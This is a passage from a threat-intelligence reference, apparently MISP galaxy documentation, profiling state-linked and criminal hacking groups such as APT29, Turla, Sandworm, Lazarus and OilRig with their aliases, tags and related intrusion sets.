A 2015 report by F-Secure describe APT29 as: ‘The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash-and-grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible. If the compromised target is |
discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long-term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss).

The tag is: misp-galaxy:threat-actor="APT 29"

APT 29 is also known as:

- Dukes
- Group 100
- Cozy Duke
- CozyDuke
- EuroAPT
- CozyBear
- CozyCar
- Cozer
- Office Monkeys
- OfficeMonkeys
- APT29
- Cozy Bear
- The Dukes
- Minidionis
- SeaDuke
- Hammer Toss
- YTTRIUM
- Iron Hemlock
- Grizzly Steppe

APT 29 has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="APT29 - G0016" with estimative-language:likelihood-probability="likely"

Table 5948. Table References

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<tr>
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</table>
Turla Group

A 2014 Guardian article described Turla as: ‘Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantec's Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.’

The tag is: misp-galaxy:threat-actor="Turla Group"

Turla Group is also known as:

- Turla
- Snake
- Venomous Bear
- VENOMOUS Bear
- Group 88
- Waterbug
- WRAITH
- Turla Team
• Uroboros
• Pfinet
• TAG_0530
• KRYPTON
• Hippo Team
• Pacifier APT
• Popeye
• SIG23
• Iron Hunter
• MAKERSMARK

Turla Group has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Turla - G0010" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="APT 26" with estimative-language:likelihood-probability="likely"

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</table>
Energetic Bear

A Russian group that collects intelligence on the energy industry.

The tag is: misp-galaxy:threat-actor="Energetic Bear"

Energetic Bear is also known as:

- Dragonfly
- Crouching Yeti
- Group 24
- Havex
- CrouchingYeti
- Koala Team
- IRON LIBERTY
Energetic Bear has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Dragonfly - G0035" with estimative-language:likelihood-probability="likely"

Table 5950. Table References

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<tr>
<td><a href="https://attack.mitre.org/groups/G0035/">https://attack.mitre.org/groups/G0035/</a></td>
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**Sandworm**

This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Some believe that the threat actor is linked to the 2015 compromise of the Ukrainian electrical grid and a distributed denial of service prior to the Russian invasion of Georgia. Believed to be responsible for the 2008 DDoS attacks in Georgia and the 2015 Ukraine power grid outage

The tag is: misp-galaxy:threat-actor="Sandworm"

Sandworm is also known as:

- Sandworm Team
- Black Energy
- BlackEnergy
• Quedagh
• Voodoo Bear
• TEMP.Noble
• Iron Viking

Sandworm has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="TeleBots" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="ELECTRUM" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="GreyEnergy" with estimative-language:likelihood-probability="likely"

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<td><a href="https://attack.mitre.org/groups/G0034/">https://attack.mitre.org/groups/G0034/</a></td>
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**TeleBots**

We will refer to the gang behind the malware as TeleBots. However it's important to say that these attackers, and the toolset used, share a number of similarities with the BlackEnergy group, which conducted attacks against the energy industry in Ukraine in December 2015 and January 2016. In fact, we think that the BlackEnergy group has evolved into the TeleBots group. TeleBots appear to be associated with Sandworm Team, Iron Viking, Voodoo Bear.

The tag is: misp-galaxy:threat-actor="TeleBots"

TeleBots is also known as:

- Sandworm
TeleBots has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="ELECTRUM" with estimative-language:likelihood-probability="likely"

Table 5952. Table References

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FIN7

Groups targeting financial organizations or people with significant financial assets.

The tag is: misp-galaxy:threat-actor="FIN7"

FIN7 is also known as:

- CARBON SPIDER
- GOLD NIAGARA
- Calcium

FIN7 has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="FIN7 - G0046" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

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3510
Researchers have uncovered a long-term cyber-espionage campaign that used a combination of
legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.

The tag is: misp-galaxy:threat-actor="TeamSpy Crew"

TeamSpy Crew is also known as:

- TeamSpy
- Team Bear
- Berserk Bear
- Anger Bear
- IRON LYRIC

TeamSpy Crew has relationships with:

- similar: misp-galaxy:threat-actor="Berserk Bear" with estimative-language:likelihood-probability="likely"

Table 5954. Table References

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<td><a href="https://www.cfr.org/interactive/cyber-operations/team-spy-crew">https://www.cfr.org/interactive/cyber-operations/team-spy-crew</a></td>
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**BuhTrap**

Buhtrap has been active since 2014, however their first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At
the moment, the group is known to target Russian and Ukrainian banks. From August 2015 to
February 2016 Buhtrap managed to conduct 13 successful attacks against Russian banks for a total
amount of 1.8 billion rubles ($25.7 mln). The number of successful attacks against Ukrainian banks
has not been identified. Buhtrap is the first hacker group using a network worm to infect the
overall bank infrastructure that significantly increases the difficulty of removing all malicious
functions from the network. As a result, banks have to shut down the whole infrastructure which
provokes delay in servicing customers and additional losses. Malicious programs intentionally scan
for machines with an automated Bank-Customer system of the Central Bank of Russia (further
referred to as BCS CBR). We have not identified incidents of attacks involving online money transfer
systems, ATM machines or payment gates which are known to be of interest for other criminal
groups.

The tag is: misp-galaxy:threat-actor="BuhTrap"

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</table>

**Berserk Bear**

The tag is: misp-galaxy:threat-actor="Berserk Bear"

Berserk Bear has relationships with:

- similar: misp-galaxy:threat-actor="TeamSpy Crew" with estimative-language:likelihood-probability="likely"

**WOLF SPIDER**

FIN4 is a financially-motivated threat group that has targeted confidential information related to
the public financial market, particularly regarding healthcare and pharmaceutical companies,
since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware,
but rather they focus on capturing credentials authorized to access email and other non-public
correspondence.
WOLF SPIDER is also known as:

- FIN4

Table 5956. Table References

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<td><a href="https://attack.mitre.org/groups/G0085/">https://attack.mitre.org/groups/G0085/</a></td>
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</table>

Boulder Bear

First observed activity in December 2013.

The tag is: misp-galaxy:threat-actor="Boulder Bear"

SHARK SPIDER

This group’s activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.

The tag is: misp-galaxy:threat-actor="SHARK SPIDER"

UNION SPIDER

Adversary targeting manufacturing and industrial organizations.

The tag is: misp-galaxy:threat-actor="UNION SPIDER"

Table 5957. Table References

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Silent Chollima

The tag is: misp-galaxy:threat-actor="Silent Chollima"

Silent Chollima is also known as:
Lazarus Group

Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover, Duuzer, and Hangman.

The tag is: `misp-galaxy:threat-actor="Lazarus Group"

Lazarus Group is also known as:

- Operation DarkSeoul
- Dark Seoul
- Hidden Cobra
- Hastati Group
- Andariel
- Unit 121
- Bureau 121
- NewRomanic Cyber Army Team
- Bluenoroff
- Subgroup: Bluenoroff
- Group 77
- Labyrinth Chollima
- Operation Troy
- Operation GhostSecret
- Operation AppleJeus
Lazarus Group has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Operation Sharpshooter" with estimative-language:likelihood-probability="likely"
- linked-to: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

**Table 5959. Table References**

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</table>
Viceroy Tiger

The tag is: misp-galaxy:threat-actor="Viceroy Tiger"

Viceroy Tiger is also known as:

- Appin
- OperationHangover
PIZZO SPIDER

The tag is: misp-galaxy:threat-actor="PIZZO SPIDER"

PIZZO SPIDER is also known as:

- DD4BC
- Ambiorx

Corsair Jackal

The tag is: misp-galaxy:threat-actor="Corsair Jackal"

Corsair Jackal is also known as:

- TunisianCyberArmy

SNOWGLOBE

In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.

The tag is: misp-galaxy:threat-actor="SNOWGLOBE"

SNOWGLOBE is also known as:

- Animal Farm
- Snowglobe
Deadeye Jackal

The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011 the SEA has been the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies. The precise nature of SEA’s relationship with the Syrian government has changed over time and is unclear.

The tag is: *misp-galaxy:threat-actor*="Deadeye Jackal"

Deadeye Jackal is also known as:

- SyrianElectronicArmy
- SEA

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<td><a href="https://en.wikipedia.org/wiki/Syrian_Electronic_Army">https://en.wikipedia.org/wiki/Syrian_Electronic_Army</a></td>
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</table>

Operation C-Major

Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.

The tag is: *misp-galaxy:threat-actor*="Operation C-Major"

Operation C-Major is also known as:
• C-Major
• Transparent Tribe
• Mythic Leopard
• ProjectM
• APT36
• APT 36
• TMP.Lapis
• Green Havildar
• COPPER FIELDSTONE

Operation C-Major has relationships with:


Table 5965. Table References

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<td><a href="https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/">https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/</a></td>
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Stealth Falcon

This threat actor targets civil society groups and Emirati journalists, activists, and dissidents.

The tag is: misp-galaxy:threat-actor="Stealth Falcon"

Stealth Falcon is also known as:
• FruityArmor

Stealth Falcon has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038" with estimative-language:likelihood-probability="likely"

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HummingBad

This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder

The tag is: misp-galaxy:threat-actor="HummingBad"

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Dropping Elephant

Dropping Elephant (also known as “Chinastrats” and “Patchwork“) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.

The tag is: misp-galaxy:threat-actor="Dropping Elephant"

Dropping Elephant is also known as:

• Chinastrats
• Patchwork
• Monsoon
• Sarit
• Quilted Tiger
• APT-C-09
ZINC EMERSON

Dropping Elephant has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Patchwork" - G0040 with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-intrusion-set="MONSOON" - G0042 with estimative-language:likelihood-probability="likely"

Table 5968. Table References

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Scarlet Mimic

Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, APT 2, it has not been concluded that the groups are the same. The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved. The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes. Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade. Both also have history of strained relationships with the government of the People’s Republic of China (PRC), though we do not have evidence that links Scarlet Mimic attacks to the PRC. Scarlet Mimic attacks have also been identified against government organizations in Russia and India, who are
responsible for tracking activist and terrorist activities. While we do not know the precise target of each of the Scarlet Mimic attacks, many of them align to the patterns described above.

The tag is: `misp-galaxy:threat-actor="Scarlet Mimic"`

**Scarlet Mimic** has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029"` with estimative-language:likelihood-probability="likely"

**Poseidon Group**

Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.

The tag is: `misp-galaxy:threat-actor="Poseidon Group"`

**Poseidon Group** has relationships with:


**DragonOK**

Threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. 2223 It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.

The tag is: `misp-galaxy:threat-actor="DragonOK"`

DragonOK is also known as:
• Moafee
• BRONZE OVERBROOK

DragonOK has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Moafee - G0002" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:mitre-intrusion-set="DragonOK - G0017" with estimative-language:likelihood-probability="likely"

Table 5971. Table References

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ProjectSauron

ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all
key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.

The tag is: `misp-gallery:threat-actor="ProjectSauron"`

ProjectSauron is also known as:

- Strider
- Sauron
- Project Sauron

ProjectSauron has relationships with:

- similar: `misp-gallery:mitre-intrusion-set="Strider - G0041"` with estimative-language:likelihood-probability="likely"

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**APT 30**

APT 30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.

The tag is: `misp-gallery:threat-actor="APT 30"`

APT 30 is also known as:

- APT30

APT 30 has relationships with:

- similar: `misp-gallery:mitre-intrusion-set="Naikon - G0019"` with estimative-language:likelihood-probability="likely"

- similar: `misp-gallery:threat-actor="Naikon"` with estimative-language:likelihood-probability="likely"

- similar: `misp-gallery:threat-actor="Lotus Panda"` with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:mitre-intrusion-set="APT30 - G0013" with estimative-language:likelihood-probability="likely"

Table 5973. Table References

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**TA530**

TA530, who we previously examined in relation to large-scale personalized phishing campaigns

The tag is: misp-galaxy:threat-actor="TA530"

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**GCMAN**

GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.

The tag is: misp-galaxy:threat-actor="GCMAN"

GCMAN has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="GCMAN - G0036" with estimative-language:likelihood-probability="likely"

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<td><a href="https://attack.mitre.org/groups/G0036/">https://attack.mitre.org/groups/G0036/</a></td>
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**Suckfly**

Suckfly is a China-based threat group that has been active since at least 2014

The tag is: misp-galaxy:threat-actor="Suckfly"
Suckfly has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Suckfly - G0039" with estimative-language:likelihood-probability="likely"

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<td><a href="https://attack.mitre.org/groups/G0039/">https://attack.mitre.org/groups/G0039/</a></td>
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**FIN6**

FIN is a group targeting financial assets including assets able to do financial transaction including PoS.

The tag is: misp-galaxy:threat-actor="FIN6"

FIN6 is also known as:

• SKELETON SPIDER
• ITG08
• MageCart Group 6
• White Giant
• GOLD FRANKLIN

FIN6 has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="FIN6 - G0037" with estimative-language:likelihood-probability="likely"

**Table S977. Table References**

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3528
Libyan Scorpions

Libyan Scorpions is a malware operation in use since September 2015 and operated by a politically motivated group whose main objective is intelligence gathering, spying on influentials and political figures and operate an espionage campaign within Libya.

The tag is: `misp-galaxy:threat-actor="Libyan Scorpions"`

TeamXRat

The tag is: `misp-galaxy:threat-actor="TeamXRat"`

TeamXRat is also known as:

- CorporacaoXRat
- CorporationXRat

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OilRig

OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.

OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturities involve:

- Organized evasion testing used the during development of their tools. - Use of custom DNS Tunneling protocols for command and control (C2) and data exfiltration. - Custom web-shells and backdoors used to persistently access servers.

OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials to accounts logged into the compromised system. The group uses these credentials to access and to move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as remote desktop and putty. OilRig also uses phishing sites to harvest credentials to individuals at targeted
organizations to gain access to internet accessible resources, such as Outlook Web Access.

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.

The tag is: misp-galaxy:threat-actor="OilRig"

OilRig is also known as:

- Twisted Kitten
- Cobalt Gypsy
- Crambus
- Helix Kitten
- APT 34
- APT34
- IRN2

OilRig has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-
probability="likely"

• similar: misp-galaxy:mitre-intrusion-set="APT34 - G0057" with estimative-language:likelihood-probability="likely"

**Table 5979. Table References**

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Volatile Cedar

Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.

The tag is: misp-galaxy:threat-actor="Volatile Cedar"

Volatile Cedar is also known as:

- Reuse team
- Malware reusers
- Dancing Salome
- Lebanese Cedar

Table 5980. Table References

Links

https://blog.checkpoint.com/2015/03/31/volatilecedar/
Malware reusers

Threat Group conducting cyber espionage while re-using tools from other teams; like those of Hacking Team, and vmprotect to obfuscate.

The tag is: misp-galaxy:threat-actor="Malware reusers"

Malware reusers is also known as:

• Reuse team
• Dancing Salome

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: misp-galaxy:threat-actor="TERBIUM"

TERBIUM has relationships with:

• similar: misp-galaxy:microsoft-activity-group="TERBIUM" with estimative-language:likelihood-probability="likely"

Table 5981. Table References

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Molerats

In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks. Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well. and as discovered later, even the U.S. and UK governments. Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.”

The tag is: misp-galaxy:threat-actor="Molerats"

Molerats is also known as:

• Gaza Hackers Team
• Gaza cybergang
• Gaza Cybergang
• Operation Molerats
• Extreme Jackal
• Moonlight
• ALUMINUM SARATOGA

Molerats has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Molerats - G0021" with estimative-language:likelihood-probability="likely"

**Table 5982. Table References**

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**PROMETHIUM**

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: *misp-galaxy:threat-actor="PROMETHIUM"*
PROMETHIUM is also known as:

- StrongPity

PROMETHIUM has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:microsoft-activity-group="PROMETHIUM" with estimative-language:likelihood-probability="likely"

Table 5983. Table References

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<td><a href="https://attack.mitre.org/groups/G0056/">https://attack.mitre.org/groups/G0056/</a></td>
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NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: misp-galaxy:threat-actor="NEODYMIUM"

NEODYMIUM has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"

Table 5984. Table References

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Packrat

A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin
American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.

The tag is: misp-galaxy:threat-actor="Packrat"

Table 5985. Table References

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<td><a href="https://citizenlab.ca/2015/12/packrat-report/">https://citizenlab.ca/2015/12/packrat-report/</a></td>
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</table>

**Cadelle**

Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, it's likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.

The tag is: misp-galaxy:threat-actor="Cadelle"

Table 5986. Table References

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<td><a href="https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets">https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets</a></td>
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</table>

**PassCV**

The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We'd like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they've begun development on.
Sath-ı Müdafaa

A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform that features points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor to hack the hackers. So the overarching motivation and allegiance of the group is not entirely clear.

Aslan Neferler Tim

Turkish nationalist hacktivist group that has been active for roughly one year. According to Domaintools, the group's site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey’s policies or leadership, and purports to act in defense of Islam.

Ayyıldız Tim

Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.

TurkHackTeam

Founded in 2004, TurkHackTeam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on TurkHackTeam’s forum, the group has carried out almost 30 highly
publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.

The tag is: misp-galaxy:threat-actor="TurkHackTeam"

TurkHackTeam is also known as:

- Turk Hack Team

**Equation Group**

The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Labs as one of the most sophisticated cyber attack groups in the world, operating alongside but always from a position of superiority with the creators of Stuxnet and Flame.

The tag is: misp-galaxy:threat-actor="Equation Group"

Equation Group is also known as:

- Tilded Team
- Lamberts
- EQGRP
- Longhorn
- PLATINUM TERMINAL

Equation Group has relationships with:

- similar: misp-galaxy:threat-actor="Longhorn" with estimative-language:likelihood-probability="likely"

**Table 5988. Table References**

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</table>
**Greenbug**

Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.

The tag is: `misp-galaxy:threat-actor="Greenbug"`

Greenbug has relationships with:

- similar: `misp-galaxy:threat-actor="CHRYSENE"` with `estimative-language:likelihood-probability="likely"`

**Gamaredon Group**

Unit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013. In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their technical capabilities.

The tag is: `misp-galaxy:threat-actor="Gamaredon Group"`

Gamaredon Group is also known as:

- Primitive Bear

